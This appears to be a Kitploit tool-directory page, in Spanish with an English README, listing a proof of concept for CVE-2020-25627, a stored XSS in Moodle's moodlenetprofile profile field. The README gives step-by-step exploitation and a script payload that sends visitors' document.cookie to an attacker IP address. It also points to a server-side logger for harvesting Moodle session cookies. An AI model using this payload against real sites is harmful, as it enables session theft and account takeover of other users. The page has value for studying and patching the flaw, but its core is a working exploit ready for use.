Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2020-25627 — XSS almacenado a través del parámetro moodlenetprofile en el perfil de usuario | Kitploit
Herramientas/GitHubGitHub/hoangkien1020/cve-2020-25627
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y Educación
GitHubhoangkien1020/cve-2020-25627

CVE-2020-25627

XSS almacenado a través del parámetro moodlenetprofile en el perfil de usuario

Ver Repositorio
3hace 5 añosAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2020-25627

XSS almacenado a través del parámetro moodlenetprofile en el perfil de usuario

Mi PoC sobre este CVE

Requisito de usuario: Estudiante (o el sitio para registro)

XSS en moodlenetprofile

root@kitploit:~
Step 1: Log in with an authenticated user (Can register or through creating a new user without assigning roles )

Step 2: Quick access to Edit profile

domain/moodle/user/edit.php?id=<your user_id>&returnto=profile

In MoodleNet profile, add the script as:

<script>alert("HK")</script>

And save:

Step 3: Anytime, the other user goes to view your profile, the stored XSS will trigger.

Steal cookie via script:

<script>var i=new Image;i.src="http://192.168.0.238/xss.php?"+document.cookie;</script>

Change your domain and upload xss.php to your host:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Done. You can view log.txt to get Moodle session.

parámetro moodlenetprofile

Versión afectada: 3.9.0 , 3.9.1

Fuente

https://moodle.org/mod/forum/discuss.php?d=410839

Impacto del XSS (robo de cookies,...), ver aquí:

https://github.com/HoangKien1020/pentest/tree/master/XSS

Descargar herramienta